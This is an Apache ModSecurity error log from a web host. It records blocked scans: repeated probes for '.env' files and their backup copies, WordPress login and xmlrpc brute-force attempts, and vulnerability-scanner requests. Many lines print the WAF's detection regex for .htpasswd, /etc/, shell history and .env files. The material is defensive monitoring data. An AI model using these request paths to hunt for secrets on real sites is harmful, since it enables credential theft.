[Tue May 26 12:53:16.287456 2026] [security2:error] [pid 461618:tid 461775] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKY1yiSlSCHr1fdr2plQAAAKA"]
[Tue May 26 12:53:17.166025 2026] [security2:error] [pid 461618:tid 461822] [client 176.65.139.236:39672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVKZVyiSlSCHr1fdr2pvAAAAM8"]
[Tue May 26 12:53:18.036916 2026] [security2:error] [pid 461618:tid 461802] [client 176.65.139.239:58024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.enattafoodparcel.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVKZlyiSlSCHr1fdr2p4AAAALs"]
[Tue May 26 12:53:18.211710 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:57773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p6AAAALk"]
[Tue May 26 12:53:18.211832 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:57773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p6AAAALk"]
[Tue May 26 12:53:18.699912 2026] [security2:error] [pid 461618:tid 461728] [remote 172.194.139.254:13623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p9gAAmm0"]
[Tue May 26 12:53:19.261200 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p_gAAALM"]
[Tue May 26 12:53:19.795886 2026] [security2:error] [pid 461618:tid 461661] [remote 51.91.98.45:41618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVKZ1yiSlSCHr1fdr2qGQAA9So"]
[Tue May 26 12:53:22.130871 2026] [security2:error] [pid 461618:tid 461767] [client 85.121.55.185:48338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 185.55.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/site/wp-admin/admin-ajax.php"] [unique_id "ahVKalyiSlSCHr1fdr2qmwAAAJg"]
[Tue May 26 12:53:22.134730 2026] [security2:error] [pid 461618:tid 461766] [client 74.7.230.5:59624] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKalyiSlSCHr1fdr2qngAAl2I"]
[Tue May 26 12:53:22.229112 2026] [security2:error] [pid 461618:tid 461824] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKaVyiSlSCHr1fdr2qkQAAANE"]
[Tue May 26 12:53:23.089651 2026] [security2:error] [pid 461618:tid 461785] [client 85.121.55.185:48328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 185.55.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/site/wp-login.php"] [unique_id "ahVKalyiSlSCHr1fdr2qvgAAAKo"], referer: https://moes-art.com/site/wp-admin/
[Tue May 26 12:53:24.859998 2026] [security2:error] [pid 461618:tid 461783] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKbFyiSlSCHr1fdr2q-wAAAKg"]
[Tue May 26 12:53:27.143939 2026] [security2:error] [pid 461618:tid 461752] [client 85.121.55.185:34600] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKb1yiSlSCHr1fdr2rNAAAAIk"]
[Tue May 26 12:53:28.053709 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKb1yiSlSCHr1fdr2rRgAAAPk"]
[Tue May 26 12:53:28.648734 2026] [security2:error] [pid 461618:tid 461797] [client 74.249.173.207:5081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVKcFyiSlSCHr1fdr2rZgAAALY"]
[Tue May 26 12:53:28.846104 2026] [security2:error] [pid 461618:tid 461855] [client 172.225.77.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVKcFyiSlSCHr1fdr2rZQAAAPA"]
[Tue May 26 12:53:28.874005 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:58134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKcFyiSlSCHr1fdr2raQAAALg"]
[Tue May 26 12:53:28.874138 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:58134] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKcFyiSlSCHr1fdr2raQAAALg"]
[Tue May 26 12:53:30.117614 2026] [security2:error] [pid 461618:tid 461848] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKcVyiSlSCHr1fdr2rhAAAAOk"]
[Tue May 26 12:53:31.814553 2026] [security2:error] [pid 461618:tid 461654] [remote 88.198.91.116:57836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVKc1yiSlSCHr1fdr2rsAAAviM"]
[Tue May 26 12:53:32.024198 2026] [security2:error] [pid 461618:tid 461749] [client 74.249.173.207:5068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVKdFyiSlSCHr1fdr2ruAAAAIY"]
[Tue May 26 12:53:32.608177 2026] [security2:error] [pid 461618:tid 461801] [client 106.77.157.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rvgAAALo"]
[Tue May 26 12:53:32.996329 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rzgAAAI4"]
[Tue May 26 12:53:35.031395 2026] [security2:error] [pid 461618:tid 461843] [client 74.249.173.207:5104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVKd1yiSlSCHr1fdr2sNQAAAOQ"]
[Tue May 26 12:53:36.562913 2026] [security2:error] [pid 461618:tid 461752] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sXgAAAIk"]
[Tue May 26 12:53:36.882173 2026] [security2:error] [pid 461618:tid 461784] [client 195.178.110.34:49354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.canopykaapi.com"] [uri "/phpinfo.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sbAAAAKk"]
[Tue May 26 12:53:37.194912 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:49364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVKeVyiSlSCHr1fdr2sdAAAANc"]
[Tue May 26 12:53:38.562972 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKelyiSlSCHr1fdr2smgAAAPo"]
[Tue May 26 12:53:39.204795 2026] [security2:error] [pid 461618:tid 461755] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2sswAAAIw"]
[Tue May 26 12:53:39.549704 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2ssgAAALM"]
[Tue May 26 12:53:39.645331 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:39.645538 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:40.288127 2026] [security2:error] [pid 461618:tid 461769] [client 74.249.173.207:4828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s1QAAAJo"]
[Tue May 26 12:53:40.733943 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:61248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s5QAAANg"]
[Tue May 26 12:53:40.737966 2026] [security2:error] [pid 461618:tid 461818] [client 208.84.100.109:30312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6QAAAMs"]
[Tue May 26 12:53:40.738427 2026] [security2:error] [pid 461618:tid 461875] [client 208.84.100.109:30326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6AAAAQQ"]
[Tue May 26 12:53:40.741204 2026] [security2:error] [pid 461618:tid 461775] [client 208.84.100.109:30296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6gAAAKA"]
[Tue May 26 12:53:40.994508 2026] [security2:error] [pid 461618:tid 461794] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s8wAAALM"]
[Tue May 26 12:53:41.680401 2026] [security2:error] [pid 461618:tid 461858] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKfVyiSlSCHr1fdr2tGAAAAPM"]
[Tue May 26 12:53:42.112910 2026] [security2:error] [pid 461618:tid 461812] [client 14.173.164.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2suAAAxUg"]
[Tue May 26 12:53:42.774629 2026] [security2:error] [pid 461618:tid 461771] [client 74.249.173.207:4818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVKflyiSlSCHr1fdr2tTwAAAJw"]
[Tue May 26 12:53:43.914907 2026] [security2:error] [pid 461618:tid 461774] [client 176.65.139.239:20092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.holix.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tbwAAAJ8"]
[Tue May 26 12:53:44.000496 2026] [security2:error] [pid 461618:tid 461784] [client 176.65.139.237:63922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.encaf.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tcwAAAKk"]
[Tue May 26 12:53:44.545071 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.copy"] [unique_id "ahVKgFyiSlSCHr1fdr2tgwAAAO8"]
[Tue May 26 12:53:44.622768 2026] [security2:error] [pid 461618:tid 461819] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKgFyiSlSCHr1fdr2tdgAAAMw"]
[Tue May 26 12:53:44.989474 2026] [security2:error] [pid 461618:tid 461803] [client 45.132.227.20:47343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVKflyiSlSCHr1fdr2tSAAAALw"]
[Tue May 26 12:53:45.114734 2026] [security2:error] [pid 461618:tid 461807] [client 195.178.110.34:40928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKgVyiSlSCHr1fdr2tlwAAAMA"]
[Tue May 26 12:53:45.210609 2026] [security2:error] [pid 461618:tid 461763] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tmAAAAJQ"]
[Tue May 26 12:53:45.625662 2026] [security2:error] [pid 461618:tid 461792] [client 173.252.79.116:50688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tpQAAsXE"]
[Tue May 26 12:53:45.914801 2026] [security2:error] [pid 461618:tid 461866] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tsQAAAPs"]
[Tue May 26 12:53:46.028601 2026] [security2:error] [pid 461618:tid 461857] [client 173.252.79.116:50700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2ttAAA8mY"]
[Tue May 26 12:53:46.047469 2026] [security2:error] [pid 461618:tid 461757] [client 208.84.100.109:30650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env~"] [unique_id "ahVKglyiSlSCHr1fdr2tuwAAAI4"]
[Tue May 26 12:53:46.047759 2026] [security2:error] [pid 461618:tid 461800] [client 208.84.100.109:30612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVKglyiSlSCHr1fdr2tvQAAALk"]
[Tue May 26 12:53:46.047885 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVKglyiSlSCHr1fdr2twQAAAO8"]
[Tue May 26 12:53:46.048810 2026] [security2:error] [pid 461618:tid 461780] [client 208.84.100.109:30622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVKglyiSlSCHr1fdr2twgAAAKU"]
[Tue May 26 12:53:46.241849 2026] [security2:error] [pid 461618:tid 461786] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVKglyiSlSCHr1fdr2tyQAAAKs"]
